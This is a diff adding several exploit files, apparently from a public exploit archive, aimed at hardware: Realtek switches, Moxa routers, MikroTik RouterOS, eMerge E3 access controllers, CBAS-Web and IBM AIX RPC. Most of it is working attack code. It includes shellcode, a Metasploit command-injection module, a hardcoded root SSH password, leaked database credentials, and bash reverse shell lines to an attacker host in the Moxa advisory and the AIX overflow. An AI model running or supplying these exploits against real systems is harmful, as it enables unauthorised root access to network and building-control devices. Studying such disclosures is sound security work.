+	if creds and args.auth:
+		creds = args.auth
+
+	if args.rport:
+		rport = args.rport
+
+	if args.etag:
+		etag = args.etag
+
+	if args.rhost:
+		rhost = args.rhost
+
+	if args.lport:
+		lport = args.lport
+
+	if args.lhost:
+		lhost = args.lhost
+
+	# Check if RPORT is valid
+	if not Validate(verbose).Port(rport):
+		log.failure("Invalid RPORT - Choose between 1 and 65535")
+		sys.exit(1)
+
+	# Check if LPORT is valid
+	if not Validate(verbose).Port(lport): #
+		log.failure("Invalid LPORT - Choose between 1 and 65535")
+		sys.exit(1)
+
+	# Let's break apart the hex code of LPORT into two bytes and check for badbyte 0x00
+	port_hex = hex(int(lport))[2:]
+	port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
+	port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
+	port_hex = port_hex.split()
+	if len(port_hex) == 1:
+		port_hex = ('00' + ' ' + ''.join(port_hex)).split()
+
+	for c in port_hex:
+		if c == '00':
+			log.failure("Choosen port (dec: {}, hex: {}) contains 0x00 - aborting".format(lport,hex(int(lport))))
+			sys.exit(1)
+
+	# Check if RHOST is valid IP or FQDN, get IP back
+	rhost = Validate(verbose).Host(rhost)
+	if not rhost:
+		log.failure("Invalid RHOST")
+		sys.exit(1)
+
+	# Check if LHOST is valid IP or FQDN, get IP back
+	lhost = Validate(verbose).Host(lhost)
+	if not lhost:
+		log.failure("Invalid LHOST")
+		sys.exit(1)
+
+	#
+	# Validation done, start print out stuff to the user
+	#
+	if args.https:
+		log.info("HTTPS / SSL Mode Selected")
+	log.info("RHOST: {}".format(rhost))
+	log.info("RPORT: {}".format(rport))
+	log.info("LHOST: {}".format(lhost))
+	log.info("LPORT: {}".format(lport))
+
+	rhost = rhost + ':' + rport
+
+	try:
+
+		headers = {
+			'Host':rhost,
+			'User-Agent':'Chrome',
+			'Accept':'*/*',
+			'Content-Type':'application/x-www-form-urlencoded'
+			}
+		#
+		# We can manually select target with the '--etag'
+		#
+		target = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).check_remote(etag)
+
+		#
+		# Whole code based on known 'target's ETag
+		#
+		if target:
+
+			if args.verify:
+				RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,True) # check all listed
+
+			elif args.hydra:
+				if not target['exploit']['heack_hydra_shell']['safe'] and not args.force:
+					log.failure("Boa/Hydra listed as not safe (most likely DoS), force with '--force'")
+					log.failure("The best chance of success is with fresh heap and select target model manually")
+					log.failure("use '--etag' for manual selection, '--etag help' for known targets")
+					success = False
+				else:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_hydra_shell(target)
+					success = False
+
+			elif args.adduser:
+				if target['exploit']['stack_cgi_add_account']['vulnerable']:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_add_account(target)
+				else:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)
+
+			elif args.deluser:
+				if target['exploit']['stack_cgi_del_account']['vulnerable']:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_del_account(target)
+				else:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)
+						if success:
+							success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)
+
+			elif args.shell:
+				success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).verify_target(target,False) # check only one
+
+				#
+				# shellcode on heap, no need to disable ASLR
+				#
+				if not target['exploit']['heack_cgi_shell']['stack']:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
+				#
+				# shellcode on stack, we need to disable ASLR
+				#
+				elif target['exploit']['stack_cgi_diag']['vulnerable']:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_diag(target)
+				elif target['exploit']['stack_cgi_sntp']['vulnerable']:
+					success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_log(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).stack_cgi_sntp(target)
+				#
+				# or we take the long way
+				#
+				elif target['login']['vulnerable'] and not target['exploit']['stack_cgi_diag']['vulnerable'] or not target['exploit']['stack_cgi_sntp']['vulnerable']:
+					if not args.auth:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).add_user(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).login(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).disable_clean_log(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).SNTP(target)
+
+					if success and not args.auth:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).del_user(target)
+					if success:
+						success = RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).logout(target)
+
+				else:
+					log.failure("We have no way to reach shellcode...")
+					success = False
+
+				#
+				# No meaning to try exploit if above failed
+				#
+				if success:
+					RTK_RTL83xx(rhost, proto, verbose, creds, raw_request,lhost, lport).heack_shell(target)
+
+	except Exception as e:
+		log.info("Failed: ({})".format(e))
+
+	log.info("All done...")
+
+	sys.exit(0)
\ No newline at end of file
diff --git a/exploits/hardware/remote/47536.txt b/exploits/hardware/remote/47536.txt
new file mode 100644
index 000000000..aeab246a8
--- /dev/null
+++ b/exploits/hardware/remote/47536.txt
@@ -0,0 +1,67 @@
+During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files. 
+
+As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose” them. 
+
+The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. 
+
+Many thanks to Moxa and ICS-CERT teams for their help.
+
+
+
+Advisory
+
+The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
+
+CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
+CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.
+
+
+Exploitation
+
+CVE-2019-10969 - Ping Command Injection
+
+The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: 
+
+Ping command injection
+
+Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
+bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
+
+
+CVE-2019-10963 - Missing Access Control On Log Files
+
+When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
+
+http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
+An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
+
+# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
+--2019-02-13 17:35:19--  http://192.168.0.1/MOXA_All_LOG.tar.gz
+Connexion à 192.168.0.1:80... connecté.
+requête HTTP transmise, en attente de la réponse... 200 OK
+Taille : 15724 (15K) [text/plain]
+Sauvegarde en : " MOXA_All_LOG.tar.gz "
+
+MOXA_All_LOG.tar.gz                                       100%[====================================================================================================================================>]  15,36K  --.-KB/s    ds 0s      
+
+2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
+
+# tar ztvf MOXA_All_LOG.tar.gz 
+drwxr-xr-x admin/root        0 2019-02-13 11:55 moxa_log_all/
+-rw-r--r-- admin/root   326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
+-rw-r--r-- admin/root      156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
+-rw-r--r-- admin/root    68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
+
+
+Mitigation
+
+It is recommended to install at least the firmware version 5.3 from Moxa website.
+
+
+
+Timeline
+
+2019-02-24: Vendor Disclosure
+2019-02-24: Advisory sent to ICS-CERT
+2019-09-30: Advisory published by Moxa
+2019-10-01: Advisory published by ICS-CERT
\ No newline at end of file
diff --git a/exploits/hardware/remote/47566.cpp b/exploits/hardware/remote/47566.cpp
new file mode 100644
index 000000000..0e9a29922
--- /dev/null
+++ b/exploits/hardware/remote/47566.cpp
@@ -0,0 +1,310 @@
+# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
+# Date: 2019-10-30
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://mikrotik.com/
+# Software Link: https://mikrotik.com/download
+# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
+# Tested on: Various x86 and MIPSBE RouterOS installs
+# CVE : CVE-2019-3978
+# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
+# Disclosure: https://www.tenable.com/security/research/tra-2019-46
+
+# Unauthenticated DNS request via Winbox
+# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests 
+# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up 
+# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.
+
+# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). 
+# The PoC will always send a DNS request for example.com. In the following write up, 
+# I detail how to use this to poison the routers cache:
+
+# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
+
+# Note that the writup focuses on router's configured *without* the DNS server enabled. 
+# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.
+
+## What are the build dependencies?
+# This requires:
+
+# * Boost 1.66 or higher
+# * cmake
+
+## How do I build this jawn?
+
+# Just normal cmake. Try this:
+
+# ```sh
+# mkdir build
+# cd build
+# cmake ..
+# make
+# ```
+
+# Resolve dependencies as needed.
+
+## Usage Example
+
+# ```sh
+# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
+# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
+# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
+# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
+# ...
+# [admin@MikroTik] > ip dns cache print
+# Flags: S - static
+# #   NAME                               ADDRESS                                                              TTL        
+# 0   example.com                        93.184.216.34                                                        5h57m57s    
+# [admin@MikroTik] >
+# ```
+
+# Source:
+# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request
+
+
+/*
+    Copyright 2019 Tenable, Inc.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                *
+
+    Redistribution and use in source and binary forms, with or without modification,
+    are permitted provided that the following conditions are met:
+
+    1. Redistributions of source code must retain the above copyright notice, this
+        list of conditions and the following disclaimer.
+
+    2. Redistributions in binary form must reproduce the above copyright notice,
+        this list of conditions and the following disclaimer in the documentation
+        and/or other materials provided with the distribution.
+
+    3. Neither the name of the copyright holder nor the names of its contributors
+        may be used to endorse or promote products derived from this software
+        without specific prior written permission.
+
+    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+    POSSIBILITY OF SUCH DAMAGE.
+*/
+#include <fstream>
+#include <cstdlib>
+#include <iostream>
+#include <boost/cstdint.hpp>
+#include <boost/program_options.hpp>
+#include <boost/algorithm/string.hpp>
+
+#include "winbox_session.hpp"
+#include "winbox_message.hpp"
+
+namespace
+{
+    const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";
+
+    bool parseCommandLine(int p_argCount, const char* p_argArray[],
+                          std::string& p_username, std::string& p_password,
+                          std::string& p_ip, std::string& p_port)
+    {
+        boost::program_options::options_description description("options");
+        description.add_options()
+        ("help,h", "A list of command line options")
+        ("version,v", "Display version information")
+        ("username,u", boost::program_options::value<std::string>(), "The user to log in as")
+        ("password", boost::program_options::value<std::string>(), "The password to log in with")
+        ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
+        ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");
+
+        boost::program_options::variables_map argv_map;
+        try
+        {
+            boost::program_options::store(
+                boost::program_options::parse_command_line(
+                    p_argCount, p_argArray, description), argv_map);
+        }
+        catch (const std::exception& e)
+        {
+            std::cerr << e.what() << "\n" << std::endl;
+            std::cerr << description << std::endl;
+            return false;
+        }
+
+        boost::program_options::notify(argv_map);
+        if (argv_map.empty() || argv_map.count("help"))
+        {
+            std::cerr << description << std::endl;
+            return false;
+        }
+
+        if (argv_map.count("version"))
+        {
+            std::cerr << "Version: " << ::s_version << std::endl;
+            return false;
+        }
+
+        if (argv_map.count("username") && argv_map.count("ip") &
+            argv_map.count("port"))
+        {
+            p_username.assign(argv_map["username"].as<std::string>());
+            p_ip.assign(argv_map["ip"].as<std::string>());
+            p_port.assign(argv_map["port"].as<std::string>());
+
+            if (argv_map.count("password"))
+            {
+                p_password.assign(argv_map["password"].as<std::string>());
+            }
+            else
+            {
+                p_password.assign("");
+            }
+            return true;
+        }
+        else
+        {
+            std::cerr << description << std::endl;
+        }
+
+        return false;
+    }
+}
+
+int main(int p_argc, const char** p_argv)
+{
+    std::string username;
+    std::string password;
+    std::string ip;
+    std::string port;
+    if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
+    {
+        return EXIT_FAILURE;
+    }
+    Winbox_Session winboxSession(ip, port);
+    if (!winboxSession.connect())
+    {
+        std::cerr << "Failed to connect to the remote host" << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    boost::uint32_t p_session_id = 0;
+    if (!winboxSession.login(username, password, p_session_id))
+    {
+        std::cerr << "[-] Login failed." << std::endl;
+        return false;
+    }
+
+    WinboxMessage msg;
+    msg.set_to(0x4c);
+    msg.set_command(0xa0065);
+    msg.set_request_id(1);
+    msg.set_reply_expected(true);
+    msg.add_u32(5,80); // height
+    msg.add_u32(6,24); // width
+    msg.add_u32(8,1);  // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
+    msg.add_string(0x0a, username); //username
+    msg.add_string(1,"");
+    msg.add_string(7, "vt102");
+    msg.add_string(9, "-l a"); // drop into telnet client shell
+    winboxSession.send(msg);
+
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    if (msg.has_error())
+    {
+        std::cout << "error: " << msg.get_error_string() << std::endl;
+    }
+
+    boost::uint32_t session_id = msg.get_u32(0xfe0001);
+
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0068);
+    msg.set_request_id(2);
+    msg.set_reply_expected(true);
+    msg.add_u32(5,82);
+    msg.add_u32(6,24);
+    msg.add_u32(0xfe0001, session_id);
+    winboxSession.send(msg);
+
+    boost::uint32_t tracker = 0;
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0067);
+    msg.set_request_id(3);
+    msg.set_reply_expected(true);
+    msg.add_u32(3, tracker);
+    msg.add_u32(0xfe0001, session_id);
+    winboxSession.send(msg);
+
+    msg.reset();
+    if (!winboxSession.receive(msg))
+    {
+        std::cerr << "Error receiving a response." << std::endl;
+        return EXIT_FAILURE;
+    }
+
+    if (msg.has_error())
+    {
+        std::cout << msg.serialize_to_json() << std::endl;
+        std::cout << "error: " << msg.get_error_string() << std::endl;
+        return EXIT_FAILURE;
+    }
+    else if (!msg.get_raw(0x02).empty())
+    {
+        std::string raw_payload(msg.get_raw(0x02));
+        tracker += raw_payload.size();
+    }
+
+    //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
+    msg.reset();
+    msg.set_to(0x4c);
+    msg.set_command(0xa0067);
+    msg.set_request_id(4);
+    msg.set_reply_expected(true);
+    msg.add_u32(3, tracker);
+    msg.add_u32(0xfe0001, session_id);
+    msg.add_raw(2, "set tracefile /pckg/option\n");
+    winboxSession.send(msg);
+
+    bool found_telnet_prompt = false;
+    while (!found_telnet_prompt)
+    {
+        msg.reset();
+        if (!winboxSession.receive(msg))
+        {
+            std::cerr << "Error receiving a response." << std::endl;
+            return EXIT_FAILURE;
+        }
+
+        if (msg.has_error())
+        {
+            std::cout << msg.serialize_to_json() << std::endl;
+            std::cout << "error: " << msg.get_error_string() << std::endl;
+            return EXIT_FAILURE;
+        }
+        else if (!msg.get_raw(0x02).empty())
+        {
+            std::string raw_payload(msg.get_raw(0x02));
+            if (raw_payload.find("telnet> ") != std::string::npos)
+            {
+                std::cout << "Success!" << std::endl;
+                found_telnet_prompt = true;
+            }
+        }
+    }
+
+    return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/exploits/hardware/remote/47625.py b/exploits/hardware/remote/47625.py
new file mode 100755
index 000000000..45adc1a1a
--- /dev/null
+++ b/exploits/hardware/remote/47625.py
@@ -0,0 +1,48 @@
+# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 4.6.07
+# Tested on: NA
+# CVE : CVE-2019-7265
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+
+#!/usr/bin/env python
+#
+# ====
+# python lineare3_sshroot.py 192.168.1.2
+# [+] Connecting to 192.168.1.2 on port 22: Done
+# [!] Only Linux is supported for ASLR checks.
+# [*] root@192.168.1.2:
+#     Distro    Unknown Unknown
+#     OS:       Unknown
+#     Arch:     Unknown
+#     Version:  0.0.0
+#     ASLR:     Disabled
+#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
+# [+] Opening new channel: 'shell': Done
+# [*] Switching to interactive mode
+# Last login: Fri Nov  1 04:21:44 2019 from 192.168.2.17
+# root@imx6slevk:~# id
+# uid=0(root) gid=0(root) groups=0(root)
+# root@imx6slevk:~# pwd
+# /home/root
+# root@imx6slevk:~# exit
+# logout
+# [*] Got EOF while reading in interactive
+# [*] Closed SSH channel with 192.168.1.2
+# ====
+
+from pwn import *
+
+if len(sys.argv) < 2:
+    print 'Usage: ./e3.py <ip>\n'
+    sys.exit()
+
+ip = sys.argv[1]
+rshell = ssh('root', ip, password='davestyle', port=22)
+rshell.interactive()
\ No newline at end of file
diff --git a/exploits/hardware/remote/47626.rb b/exploits/hardware/remote/47626.rb
new file mode 100755
index 000000000..88ae4a2c0
--- /dev/null
+++ b/exploits/hardware/remote/47626.rb
@@ -0,0 +1,95 @@
+# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
+# Google Dork: NA
+# Date: 2018-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Version: 4.6.07
+# Tested on: NA
+# CVE : CVE-2019-7265
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
+#
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Linear eMerge E3 Access Controller Command Injection',
+        'Description'    => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
+          function allowing arbitrary command execution with root privileges.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module
+          ],
+        'References'     =>
+          [
+            [ 'URL', 'https://applied-risk.com/labs/advisories' ],
+            [ 'URL', 'https://www.nortekcontrol.com' ],
+            [ 'CVE', '2019-7256']
+          ],
+        'Privileged'     => false,
+        'Payload'        =>
+          {
+            'DisableNops' => true,
+          },
+        'Platform'       => [ 'unix' ],
+        'Arch'           => ARCH_CMD,
+        'Targets'        => [ ['Linear eMerge E3', { }], ],
+        'DisclosureDate' => "Oct 29 2019",
+        'DefaultTarget'  => 0
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'        => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
+      'vars_get'   =>
+        {
+         'No'      => '251',
+         'door'    => '1337'
+        }
+    })
+    if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => uri,
+      'vars_get' =>
+        {
+          'No'   => '251',
+          'door' => "`"+cmd+"`"
+        }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Exploit failed!')
+    end
+    res
+  end
+
+  def exploit
+    http_send_command(payload.encoded)
+    print_status("Sending #{payload.encoded.length} byte payload...")
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/remote/47629.txt b/exploits/hardware/remote/47629.txt
new file mode 100644
index 000000000..5f3fd3498
--- /dev/null
+++ b/exploits/hardware/remote/47629.txt
@@ -0,0 +1,20 @@
+# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 19.0.0
+# Tested on: NA
+# CVE : CVE-2019-10849
+# Advisory: https://applied-risk.com/resources/ar-2019-009
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
+openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
+
+$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
+#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
+#    mysql -u root --password="souper secrit" -e "describe $i" wadb;
+mysql -u root --password="souper secrit" $DB < $filename.sql
+$MYSQL -u root --password="souper secrit" -e "$SQL"
\ No newline at end of file
diff --git a/exploits/hardware/remote/47888.py b/exploits/hardware/remote/47888.py
new file mode 100755
index 000000000..4141780a0
--- /dev/null
+++ b/exploits/hardware/remote/47888.py
@@ -0,0 +1,256 @@
+# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
+# Date: 2018-09-19
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.ibm.com/us-en/
+# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
+# Tested on: IBM AIX PPC
+# CVE: CVE-2017-3623
+# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
+
+
+#!/usr/bin/python
+# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
+
+# Exploit code example; shellcode requires /usr/bin/bash on the target
+
+# Example values for my AIX 7.2 LPAR:
+# gid_base: 3007d390
+# execl_func: d0307940
+# execl_toc: f081bc20
+
+# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
+
+from os import urandom
+from socket import socket, AF_INET, SOCK_STREAM
+from struct import pack, unpack
+from sys import argv, exit
+from time import time, sleep
+
+def getCredLoopbackBody():
+	global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
+
+	epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
+
+	# Doesn't matter, ljust call assumes len <= 4
+	node_name = 'hn'
+	node_length = pack('>I', len(node_name))
+	node_name = node_name.ljust(4, '\x00')
+
+	# Also doesn't matter
+	uid = pack('>I', 0)
+	gid = pack('>I', 0)
+
+	# Big enough to trigger an overflow
+	# Not big enough to trigger defensive code
+	# You could make this a little bit less,
+	# but you'd have to tweak the part 2 code
+	gids_len = pack('>I', 64)
+
+	base_addr = pack('>I', gid_base)
+	addr_8c = pack('>I', gid_base + 0x8c)
+	addr_a8 = pack('>I', gid_base + 0xa8)
+	addr_4c = pack('>I', gid_base + 0x4c)
+
+	func_addr = pack('>I', execl_func)
+	toc_addr = pack('>I', execl_toc)
+
+	cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
+	cmd = cmd.ljust(0x30, '\x00')
+
+	# Each GID is 4 bytes long, we want 64
+	gids = (
+		# +0x0 # filepath
+		'/usr/bin/bash\x00\x00\x00'
+
+		# +0x10 # argv[0]
+		'bash\x00\x00\x00\x00'
+
+		# +0x18 # argv[1]
+		'-c\x00\x00'
+
+		# +0x1c # argv[2]
+	) + cmd + (
+
+		# +0x4c # r3 = filepath
+		'\x70\x63\x00\x00' # andi. r3, r3, 0x0
+		'\x3c\x60'
+	) + base_addr[0:2] + ( # lis r3, ...
+		'\x60\x63'
+	) + base_addr[2:4] + ( # ori r3, r3, ...
+
+		# +0x58 # r4 = argv[0]
+		'\x38\x83\x00\x10' # addi r4, r3, 0x10
+
+		# +0x5c # r5 = argv[1]
+		'\x38\xa4\x00\x08' # addi r5, r4, 0x8
+
+		# +0x60 # r6 = argv[2]
+		'\x38\xc5\x00\x04' # addi r6, r5, 0x4
+
+		# +0x64 # r7 = NULL
+		'\x70\xe7\x00\x00' # andi. r7, r7, 0x0
+
+		# +0x68 # r2 = libc.a TOC for execl
+		'\x70\x42\x00\x00' # andi. r2, r2, 0x0
+		'\x3c\x40'
+	) + toc_addr[0:2] + ( # lis r2, ...
+		'\x60\x42'
+	) + toc_addr[2:4] + ( # ori r2, r2, ...
+
+		# +0x74 # execl
+		'\x71\x08\x00\x00' # andi. r8, r8, 0x0
+		'\x3d\x00'
+	) + func_addr[0:2] + ( # lis r8, ...
+		'\x61\x08'
+	) + func_addr[2:4] + ( # ori r8, ...
+		'\x7d\x09\x03\xa6' # mtctr r8
+		'\x4e\x80\x04\x21' # bctrl
+
+		# +0x88 # 0x14 padding
+		'AAAAAAAAAAAAAAAAAAAA'
+
+		# +0x9c # Will be NULL
+		'ZZZZ'
+
+		# +0xa0
+		# @+948: r5 = +0x8c
+		# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
+
+		# +0xa4
+		# @+968: r5 = +0xa8
+		# @+972: r0 = *(r5 + 0x0) = *(+0xa8)
+
+		# +0xa8
+		# @+972: r0 = +0x4c
+		# @+980: ctr = r0 = +0x4c
+		# @+988: branch to ctr
+	) + addr_8c + addr_a8 + addr_4c + (
+
+		# +0xac # padding
+		'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
+	)
+
+	print ":".join("{:02x}".format(ord(c)) for c in gids)
+	print len(gids)
+
+	return epoch + node_length + node_name + uid + gid + gids_len + gids
+
+def getCredLoopback():
+	cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
+
